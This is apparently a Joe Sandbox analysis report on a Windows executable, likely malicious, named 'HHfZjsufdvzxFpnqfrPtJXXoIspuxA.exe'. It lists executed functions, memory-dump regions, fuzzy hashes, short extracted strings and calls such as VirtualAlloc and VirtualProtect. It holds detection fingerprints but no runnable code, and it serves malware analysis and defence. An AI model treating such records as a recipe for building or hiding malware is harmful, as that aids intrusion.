Opcode ID: f7e82cd3e26319efb33afd8b7de4f7ad577705fca5a5c01a7969772ef3290a34
Instruction ID: 347e0ae0fe448348be52f14e1e3bfce9744c08a51d64221ec1529104432fd9b2
Opcode Fuzzy Hash: f7e82cd3e26319efb33afd8b7de4f7ad577705fca5a5c01a7969772ef3290a34
Instruction Fuzzy Hash: 2CF0207080DB8CDFEB52AB28845C6BDBFF0FF16301F4545AAE008C6061EA389288C791

Function 00007FFAAC440F69 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2611103822.00007FFAAC42A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC42A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac42a000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8328253472be7eb3c9e2302fc4ff61c2b3db727af270070b24be6cd89027f35a
Instruction ID: c40360bda25c68ed04a2a4457ff4b5a33d30fc26ec65c7126e9137353ba47fa0
Opcode Fuzzy Hash: 8328253472be7eb3c9e2302fc4ff61c2b3db727af270070b24be6cd89027f35a
Instruction Fuzzy Hash: 3801E87092461ACFEB44EB64C958AEEB7F1FB49314F504535C01AE22A1DB78A954CB84

Function 00007FFAAC41C529 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2611103822.00007FFAAC416000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC416000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac416000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 231b9a15e5cbbe24bbc22b41ebffd21d7f87ca07b7397184d0f95ee318a68c38
Instruction ID: 3986bc0cd0d3981ef382fe7829f390aa94bfc906d9f3fcb89d6d647c429e2c81
Opcode Fuzzy Hash: 231b9a15e5cbbe24bbc22b41ebffd21d7f87ca07b7397184d0f95ee318a68c38
Instruction Fuzzy Hash: 43F0A075909A5FCFDB90DF189849AEABBB0EF52210F5043A6D46CC71E2DE309A918B44

Function 00007FFAAC3FFA99 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2611103822.00007FFAAC3FB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3FB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac3fb000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6df86f5af2b4e50195fab9a08be3d4b0b5f106b2baddd0857967b7f96c08f5b7
Instruction ID: e367d0be4fb08517e1a72b1736d30e0b56a7b08c5c4ffd7de41e6d85f41c29b8
Opcode Fuzzy Hash: 6df86f5af2b4e50195fab9a08be3d4b0b5f106b2baddd0857967b7f96c08f5b7
Instruction Fuzzy Hash: D6F0543190EBC9CFDB56EF24891559DBFB0AF16310F0545E6D508C7192D638D918C791

Function 00007FFAAC3ECDDE Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2611103822.00007FFAAC3E4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac3e4000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f90a9a168c575015a56064b4c31cbf56e865ae48798fef31bf63b27919b5790c
Instruction ID: 32b095b60bd07380348e113f3233d0b7f7b7f7d368fbc409688b29925332d660
Opcode Fuzzy Hash: f90a9a168c575015a56064b4c31cbf56e865ae48798fef31bf63b27919b5790c
Instruction Fuzzy Hash: AEF05E70D0851A8BE7A4DB28CC55AB9B7A2EB84340F1081F6800DA2592CE352D868F80

Function 00007FFAAC955EA8 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2622343729.00007FFAAC950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac950000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd0ee9ebc00f558fdfaa25f1db1c0e6fdab5e75b3ceb4c556ed2783e04d090ce
Instruction ID: 6a6ded3d79f5fe3dff9f9e92d2534e21bedf04f61ef50d7dcff13748904ca461
Opcode Fuzzy Hash: fd0ee9ebc00f558fdfaa25f1db1c0e6fdab5e75b3ceb4c556ed2783e04d090ce
Instruction Fuzzy Hash: 63E0AE74E2A41EEEAF949B94C4815BDB770BF49211F10483AD11EE2192DA2964089A91

Function 00007FFAAC432D55 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2611103822.00007FFAAC42A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC42A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac42a000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2be858ebe905c19cf2cb7e26e81b4a675d80c6f5eb95a916fffe68a7db645bec
Instruction ID: 9101d6e0053c654bd2ae3766ad449c96338ed354bc178e2febada824ecfa2b43
Opcode Fuzzy Hash: 2be858ebe905c19cf2cb7e26e81b4a675d80c6f5eb95a916fffe68a7db645bec
Instruction Fuzzy Hash: C5E08C36A0940DDFEF5ACF14C864CED7761EFA6315B1541A6D00FC7251DA31E946CB80

Function 00007FFAAC4244B4 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2611103822.00007FFAAC416000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC416000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac416000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d2d8661b7171df99668568eeb2332c81d74482f62bbc0c8cb4900e7a8ca134d
Instruction ID: 51c8ce4753ea5856d21075b97060090e135320a2da23327fb4911b00c79c0a3c
Opcode Fuzzy Hash: 1d2d8661b7171df99668568eeb2332c81d74482f62bbc0c8cb4900e7a8ca134d
Instruction Fuzzy Hash: 50D0E231A14A1DCFEF90EF58D841AECB7B1FB49211F004466D11DD7241DE30A998CB80

Function 00007FFAAC4325A2 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2611103822.00007FFAAC42A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC42A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac42a000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebbd76dc98cd9e601b310bbe64c6551b3599f3ac35aa59284646e74afbd35974
Instruction ID: da42724828a580fbf568142712eb23f5c220ad1f7b493ea0995409d2f1c90342
Opcode Fuzzy Hash: ebbd76dc98cd9e601b310bbe64c6551b3599f3ac35aa59284646e74afbd35974
Instruction Fuzzy Hash: 4BE01275C1A228CFEB689B10D8807ECB6B0FF40305F1040AED04EA2281DA389AC8DF45

Function 00007FFAAC9588C2 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2622343729.00007FFAAC950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac950000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fb73b5618352f28dd08233bea22115fa2080ad01c563a0b617c021c51c9d6b5
Instruction ID: feb9421b4705058cd9c1f9ad391e59e48e894669babeb6e3c8dcfd9447a3e870
Opcode Fuzzy Hash: 4fb73b5618352f28dd08233bea22115fa2080ad01c563a0b617c021c51c9d6b5
Instruction Fuzzy Hash: 04D0C934558849CFE694DF18C094C6433E0EB5934471140A8D10BC7264DA24FC49DBC1

Function 00007FFAAC436E44 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2611103822.00007FFAAC42A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC42A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac42a000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 090411f1fc7c116683d9d4ff401a2840d7c68dcf19aede7d6eabcc752fd55b61
Instruction ID: 7e118e11096469c53773aa23dd905a46b7c9996b7e82f4c514de1a456018f517
Opcode Fuzzy Hash: 090411f1fc7c116683d9d4ff401a2840d7c68dcf19aede7d6eabcc752fd55b61
Instruction Fuzzy Hash: 14D0A964A15559CBFBA6AB04988A3E86BF2FB9A308F0041A5D08CC3242CA2448048B84

Function 00007FFAAC95BE8B Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2622343729.00007FFAAC950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac950000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75002859abd73323ee9aa0928632d74f17e76292a616f7a6721d89b2693a4357
Instruction ID: 2c65995da53bddd335c9de9a32370d74c68543e6d66c0f84f2342e3bd38902f3
Opcode Fuzzy Hash: 75002859abd73323ee9aa0928632d74f17e76292a616f7a6721d89b2693a4357
Instruction Fuzzy Hash: 13D09218A0F50BC5F6288711812463D63A89F1A700E28C43ED15F418C1CD18F90D62C2

Function 00007FFAAC956268 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2622343729.00007FFAAC950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac950000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a84bddeb703a32f069bccbfb1c6110efeef2dbcc220f6fd391398b136fac5aa
Instruction ID: c54e26daa3a3b0fdd1a2e9a8751a3dfcd13d867e8cffbca610da372bd2109528
Opcode Fuzzy Hash: 5a84bddeb703a32f069bccbfb1c6110efeef2dbcc220f6fd391398b136fac5aa
Instruction Fuzzy Hash: 9AC0921DC8E10BCBFA98135A01011FC73C19F67BA0B628679E05EC2682DC4DF84F20E1

Function 00007FFAAC953A84 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2622343729.00007FFAAC950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac950000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20ad1db09bc2dcacee68d4e9de41f30f80791d92fe7806e3dfc437519134b110
Instruction ID: 45ab016632d2359d4f882ba397cdff60e151f8d673e4bf0e512fc6d40c51dfb8
Opcode Fuzzy Hash: 20ad1db09bc2dcacee68d4e9de41f30f80791d92fe7806e3dfc437519134b110
Instruction Fuzzy Hash: C5C0124684F38FCAFA658F2894143B82F406F22244F2042BAD08D420C3DA18EA0EA292

Function 00007FFAAC959515 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2622343729.00007FFAAC950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac950000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfa6aecdee76d6017713608b76e99d7aa56f145e8ea8bdc2a5631f22aff77d2b
Instruction ID: efa116a14d206cdb6baf46090bb06fdf5719c0dceebb5553d7e1a7777be18225
Opcode Fuzzy Hash: cfa6aecdee76d6017713608b76e99d7aa56f145e8ea8bdc2a5631f22aff77d2b
Instruction Fuzzy Hash: 98C08C30448401CFAB84EB11C048C2033D0EB2935032141E8C60BCF2B0DB20FD04CB81

Function 00007FFAAC95AFFF Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2622343729.00007FFAAC950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac950000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cc86d5bae4b069fabee77a911d9d894d1babbefd8979d3ac9b950bab0cd2abb
Instruction ID: 359b3752e4f68aa6397f4a6a13cf5ae38e44e0775f8b2a2444edc90be333f8c8
Opcode Fuzzy Hash: 1cc86d5bae4b069fabee77a911d9d894d1babbefd8979d3ac9b950bab0cd2abb
Instruction Fuzzy Hash: 57C04848E4E287DABA2516B0089607D17800F27240F95897AE12E8A1C3EC5CA80E66B5

Non-executed Functions

Function 00007FFAAC4021E8 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001E.00000002.2611103822.00007FFAAC3FB000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3FB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac3fb000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 677fd4604157320617c4aaeeb406ab2c0f47c40a614af3c7fda9d315fe661626
Instruction ID: 9218740fd50b25c1bda297aed1a0d126e1d25fb93821190dd16dcde7d3a368ee
Opcode Fuzzy Hash: 677fd4604157320617c4aaeeb406ab2c0f47c40a614af3c7fda9d315fe661626
Instruction Fuzzy Hash: 7151236144E3C18FD7038B745C765927FB0AF13224B0E85DBD4C5CB4A3E55C5A5AD362

Function 00007FFAAC3E7BFB Relevance: 5.1, Strings: 4, Instructions: 73COMMON

Download Yara Rule

Strings

N, xrefs: 00007FFAAC3E7C2C
{, xrefs: 00007FFAAC3E8051
(, xrefs: 00007FFAAC3E5BFD
F, xrefs: 00007FFAAC3E7C5C

Memory Dump Source

Source File: 0000001E.00000002.2611103822.00007FFAAC3E4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3E4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_30_2_7ffaac3e4000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID: ($F$N${
API String ID: 0-1239127037
Opcode ID: 9df5186999b771ed20bc07dded89dc9fa1fdc6f03e5aecba4a6118c99b591b97
Instruction ID: f6b5307e4785efd7e0ad4da2587cc8f127378d384e010df56aae636484e5937e
Opcode Fuzzy Hash: 9df5186999b771ed20bc07dded89dc9fa1fdc6f03e5aecba4a6118c99b591b97
Instruction Fuzzy Hash: 5F31B870D19A29CEEBA4EB14C845BA9B6F0EF55701F1081F9C14DA2281CF396AC4CF91

Analysis Process: HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exePID: 5664, Parent PID: 932COMMON

Execution Graph

Execution Coverage:	4.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	6
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFAAC40B86D Relevance: 10.6, Strings: 7, Instructions: 1816
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

WK_H, xrefs: 00007FFAAC40CD72
_, xrefs: 00007FFAAC40C96C
LK_H, xrefs: 00007FFAAC40D86D
6, xrefs: 00007FFAAC40DDF1
p[, xrefs: 00007FFAAC40CEED
}, xrefs: 00007FFAAC40BEE2
p[, xrefs: 00007FFAAC40D242

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC40B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC40B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac40b000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID: 6$ }$LK_H$WK_H$_$p[$p[
API String ID: 0-373628110
Opcode ID: f3faa8af1cd9ed2afc10adc3ff01256e9b0f9670e3fa938fd505c430191c275e
Instruction ID: 196bd388be48d5179aa0594f89c5ea59cf7c8a9310efba2ed11ed63265d2846d
Opcode Fuzzy Hash: f3faa8af1cd9ed2afc10adc3ff01256e9b0f9670e3fa938fd505c430191c275e
Instruction Fuzzy Hash: 3EF220B0D09A59CFEB98DB18C895BA9B7B1FF55300F1042A9D00DE7296CE34AD85CF85

Function 00007FFAAC3F0DA0 Relevance: 5.3, Strings: 4, Instructions: 290
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6, xrefs: 00007FFAAC3F0F1D
r6, xrefs: 00007FFAAC3F0F40
b4, xrefs: 00007FFAAC3F0F9C
"9, xrefs: 00007FFAAC3F0E47

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac3f0000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID: "9$b4$r6$r6
API String ID: 0-2382298496
Opcode ID: fc90fcefd32cb892d5b945c9dccf1c41454f6b35dc5ad7d1036e5b41348a8828
Instruction ID: 0703976f0b26388d8b852189a5e521faeb487a89f045c59a26229bf7002967c0
Opcode Fuzzy Hash: fc90fcefd32cb892d5b945c9dccf1c41454f6b35dc5ad7d1036e5b41348a8828
Instruction Fuzzy Hash: 13A1D3B1918E4D8FE799DB68C855BA9BFE1FB96300F0042BAD04DD72E2CE785815C790

Function 00007FFAAC43A000 Relevance: 1.8, Strings: 1, Instructions: 504
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6, xrefs: 00007FFAAC43A0B3

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac43a000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID: r6
API String ID: 0-2984296541
Opcode ID: b17f971074e2b5720b971afe84a67a2d9cf53fc2a91a446606f9cb1f073966b7
Instruction ID: be391e168e2879d6a201c13ede39b42b3898b015136bb860724a4dda6ca714f1
Opcode Fuzzy Hash: b17f971074e2b5720b971afe84a67a2d9cf53fc2a91a446606f9cb1f073966b7
Instruction Fuzzy Hash: 3A224970D146198FDB18DFA8C494AECBBB1FF89304F148269D41AEB346DA34A985CF94

Function 00007FFAAC42FAB9 Relevance: 4.0, Strings: 3, Instructions: 274
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6, xrefs: 00007FFAAC42FD68
p[, xrefs: 00007FFAAC42FC8D
X, xrefs: 00007FFAAC42FB23

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC426000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC426000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac426000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID: X$p[$r6
API String ID: 0-766787601
Opcode ID: 3f2a280c37cc434c21bf61fbee4b9dd2cdc7ed9ebfa52d42447faac50a5de518
Instruction ID: baab1c57fd3232f0f3c779ae8967a9ab9ae0584c5bc3f1686acf9509fb753bf1
Opcode Fuzzy Hash: 3f2a280c37cc434c21bf61fbee4b9dd2cdc7ed9ebfa52d42447faac50a5de518
Instruction Fuzzy Hash: 87B12874A08A1DCFEB98EF68C495AADB7B2FF59300F5045A9D00DE7292DB34A845CF40

Function 00007FFAAC3FA378 Relevance: 2.6, Strings: 2, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

r6, xrefs: 00007FFAAC3FA851
_, xrefs: 00007FFAAC3FA85B

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC3F4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac3f4000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID: _$r6
API String ID: 0-3539223154
Opcode ID: d6196ce45fd5160aa6071c63df8f8db64b2565dfb0a2caf8372dd77e2a6c880a
Instruction ID: 6471d1a5b38e56a9b2c0831ff5eb544487b458084523799a7f51263dfcf959ba
Opcode Fuzzy Hash: d6196ce45fd5160aa6071c63df8f8db64b2565dfb0a2caf8372dd77e2a6c880a
Instruction Fuzzy Hash: 6251C970A09A1DCFEBA4EB18C844AA9B7F1FF59341F4045E9900DE7252DB34AE85CF91

Function 00007FFAAC4020CE Relevance: 1.7, APIs: 1, Instructions: 190
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007FFAAC40220A

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC3FF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3FF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac3ff000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 81b9341d5d801e6d86fee82c4b8b6c049fd3c045b6ff677f53699397e9fabaca
Instruction ID: b5197e516c98507c73dbb855a90f28ca3ee0259532cd8f6cf669a4dac7788b6c
Opcode Fuzzy Hash: 81b9341d5d801e6d86fee82c4b8b6c049fd3c045b6ff677f53699397e9fabaca
Instruction Fuzzy Hash: A2517170D0864D8FDB54DFA8D845AEDBBF1FB66310F10826AD44DE3252DB74A885CB81

Function 00007FFAAC403ABD Relevance: 1.4, APIs: 1, Instructions: 192
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE ref: 00007FFAAC403BDF

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC3FF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3FF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac3ff000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e81a2ced28df9ef374e823c9e2b380b9af32765692d92f548733383c39a1a8ff
Instruction ID: 9fee461a578675a52c805f8022c74b43df8dd23392ce3556b3b9d682e52722eb
Opcode Fuzzy Hash: e81a2ced28df9ef374e823c9e2b380b9af32765692d92f548733383c39a1a8ff
Instruction Fuzzy Hash: 71512E70908A5C8FDF94DF68D845BE9BBF1FB69310F1081AAD04DE3251DB75A9858B80

Function 00007FFAAC42FB2F Relevance: 1.4, Strings: 1, Instructions: 187
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

p[, xrefs: 00007FFAAC42FC8D

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC426000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC426000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac426000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID: p[
API String ID: 0-2643120810
Opcode ID: 3fcf39bbae50f71b23671830c71637c8a598fd8927e77ec269087b65b27aa094
Instruction ID: df2225e1a12f0c05969d8ab4d41941adf76d9aeef81a08985c20dfe8121103f4
Opcode Fuzzy Hash: 3fcf39bbae50f71b23671830c71637c8a598fd8927e77ec269087b65b27aa094
Instruction Fuzzy Hash: E171D774A1492D8FEF98EF68C895BA977B2FF58300F5045A9D00DE7292DA34AD85CF40

Function 00007FFAAC3F4812 Relevance: 1.3, Strings: 1, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

w, xrefs: 00007FFAAC3F4874

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC3F4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac3f4000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID: w
API String ID: 0-476252946
Opcode ID: 9a9936b54abe6d0cd635240b7110a8d388a184919ee48fb9734537e2c1d0c0cd
Instruction ID: 13887322db224e696cd067a64c0f61bd780ce37c811d847ce2b51fad8af0a93e
Opcode Fuzzy Hash: 9a9936b54abe6d0cd635240b7110a8d388a184919ee48fb9734537e2c1d0c0cd
Instruction Fuzzy Hash: C2011E70D09A29CAFBA09B14D844BE9B7B0EF45304F1085F8D14DA6291DB385E88CF95

Function 00007FFAAC407001 Relevance: .6, Instructions: 550
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC407000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC407000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac407000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e4ca72b2928ee451f4b3497fc09c6833bb505e944af0ea790ae583936179d06
Instruction ID: 6971a2628d89454ba10d6e8185d8daf9fd78faac33b38e7fe38c8db87ea6ab5a
Opcode Fuzzy Hash: 8e4ca72b2928ee451f4b3497fc09c6833bb505e944af0ea790ae583936179d06
Instruction Fuzzy Hash: 883282B4A05619CFE755EB24C488F99B3A1FF59304F5086F1D01DCB3A6DA38ED84CAA1

Function 00007FFAAC43D33D Relevance: .4, Instructions: 436
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac43a000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4487cd2c10d7dfa9358612ac7c49120d9d2ddacd510f03bd3d964dba917e5e26
Instruction ID: 4bea51a4b3795cd2aa49504a9e2da6fc8b1b1c08cfa9e1bf13bb62f7abaf20d1
Opcode Fuzzy Hash: 4487cd2c10d7dfa9358612ac7c49120d9d2ddacd510f03bd3d964dba917e5e26
Instruction Fuzzy Hash: FCF181B1D28A598FEB98DB58C455BF8B7E1FF55304F4481B9D00EE7292CE38A884CB41

Function 00007FFAAC43BA19 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC43A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC43A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac43a000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea79aa7589a2f84b4dff0f8a0ae4019b7b0f3da63e09d7de31c9f09f948e8a35
Instruction ID: 9e641b479cfb449c96d47692e9b856c6891b64b9428cade80d48cb57afbb635e
Opcode Fuzzy Hash: ea79aa7589a2f84b4dff0f8a0ae4019b7b0f3da63e09d7de31c9f09f948e8a35
Instruction Fuzzy Hash: AC913170D19659CFEBA4DB14C859BE8B7B1EF99304F1081BAD40DE3391CE34A9898F85

Function 00007FFAAC408B89 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC407000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC407000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_7ffaac407000_HHfZjsufdvzxFpnqfrPtJXXoIspuxA.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62e1bd87bd9291c81e3ba053a86be2caf7b3e84ec1ef5644be741df852c4f243
Instruction ID: df0102ac989e18d7adb0873068e4220f4151085661bc4ed3d7746ab9fce1d472
Opcode Fuzzy Hash: 62e1bd87bd9291c81e3ba053a86be2caf7b3e84ec1ef5644be741df852c4f243
Instruction Fuzzy Hash: 6E51AF70A09A0DDFDF84EF58D484AED7BF1FF69315B0541A6E409E7261D634E894CB80

Function 00007FFAAC3F0BB5 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001F.00000002.1886896321.00007FFAAC3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC3F0000, based on PE: false

Joe Sandbox IDA Plugin

